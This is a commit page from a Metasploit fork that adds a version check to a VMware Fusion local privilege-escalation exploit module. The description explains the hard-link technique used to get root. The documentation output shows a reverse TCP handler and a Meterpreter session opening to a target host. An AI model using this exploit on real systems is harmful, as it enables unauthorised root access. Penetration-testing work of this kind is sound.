adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

add version check

Browse Source
This commit is contained in:
h00die
2020-03-24 14:27:31 -04:00
committed by h00die
parent eda3653a51
commit 7bc30ecf39
2 changed files with 17 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/osx/local/vmware_fusion_lpe.md
+2
View File
@@ -46,6 +46,8 @@ lhost => 1.1.1.1
resource (fusion.rb)> set lport 8888
lport => 8888
resource (fusion.rb)> exploit
[+] Vmware Fusion 11.5.1 is exploitable
[*] The target appears to be vulnerable.
[*] Started reverse TCP handler on 1.1.1.1:8888
[*] Sending stage (53755 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:8888 -> 2.2.2.2:49265) at 2020-03-23 18:07:57 -0400
modules/exploits/osx/local/vmware_fusion_lpe.rb
+15 -4
View File
@@ -23,6 +23,7 @@ class MetasploitModule < Msf::Exploit::Local
user home directory in a specific folder, and creating a hard link to the 'Open VMWare
USB Arbitrator Service' binary, we're able to launch it temporarily to start our payload
with an effective UID of 0.
Successfully tested against 11.5.1, and 11.5.2
),
'License' => MSF_LICENSE,
'Author' =>
@@ -69,11 +70,21 @@ class MetasploitModule < Msf::Exploit::Local
end
def check
if exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}"
print_good "'#{usb_service}' binary detected"
return CheckCode::Appears
unless exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}"
print_bad "'#{usb_service}' binary missing"
return CheckCode::Safe
end
CheckCode::Safe
version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString"
/=> "(?<version>\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw #supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2
version = Gem::Version.new(version)
if version.between?(Gem::Version.new('11.5.0'), Gem::Version.new('11.5.2'))
vprint_good "Vmware Fusion #{version} is exploitable"
else
print_bad "VMware Fusion #{version} is NOT exploitable"
return CheckCode::Safe
end
CheckCode::Appears
end
def exploit